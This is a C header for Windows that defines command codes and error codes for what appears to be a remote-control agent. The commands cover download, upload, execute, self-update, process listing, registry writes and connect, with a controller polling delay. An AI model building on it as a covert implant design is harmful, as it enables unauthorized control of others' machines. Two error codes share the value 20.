#if !defined(MAINDEF_H__36DB8046_25CF_412B_8619_391C20E99D42__INCLUDED_)
#define MAINDEF_H__36DB8046_25CF_412B_8619_391C20E99D42__INCLUDED_

#include <windows.h>
#define CSIDL_PERSONAL 5
#define CSIDL_APPDATA 26

#define _VERSION 2003

#define _MAXSTRLEN 255

#define _DELAYCOMMANDER 10000
//#define _DELAYCOMMANDER 10000


#define _CMD_DOWNLOAD 0
#define _CMD_UPLOAD 1
#define _CMD_EXECUTE 2
#define _CMD_MESSAGEBOX 3
#define _CMD_UPDATE 4
#define _CMD_LISTPROCESS 5
#define _CMD_GETINFO 6
#define _CMD_SETREGVALUE 7
#define _CMD_GETREGVALUE 8
#define _CMD_SETTTS 9
#define _CMD_CONNECT 10

#define _ERROR_NO_ERROR 0
#define _ERROR_EXE_FILENOTFOUND 1
#define _ERROR_EXE_COMMANDNOTFOUND 2

#define _ERROR_CMD_INVALID 10
#define _ERROR_CMD_INVALIDNUMBERPARAMETERS 11
#define _ERROR_CMD_INVALIDHTTPCODE 12
#define _ERROR_CMD_COMMANDNOTFOUND 13
#define _ERROR_CMD_FILENOTCOMPLETE 14
#define _ERROR_CMD_UPLOADFAILED 15
#define _ERROR_CMD_EXECFAILED 16
#define _ERROR_CMD_UPDATERENAMEFAILED 17
#define _ERROR_CMD_REGKEYWRITEFAILED 18
#define _ERROR_CMD_REGKEYREADFAILED 19
#define _ERROR_CMD_TTSNOTGOOD 20
#define _ERROR_CMD_CONNECTFAILED 20
#define _ERROR_SYS_MALOCFAILED 30
#define _ERROR_FN_NOT_FOUND 1024

#endif
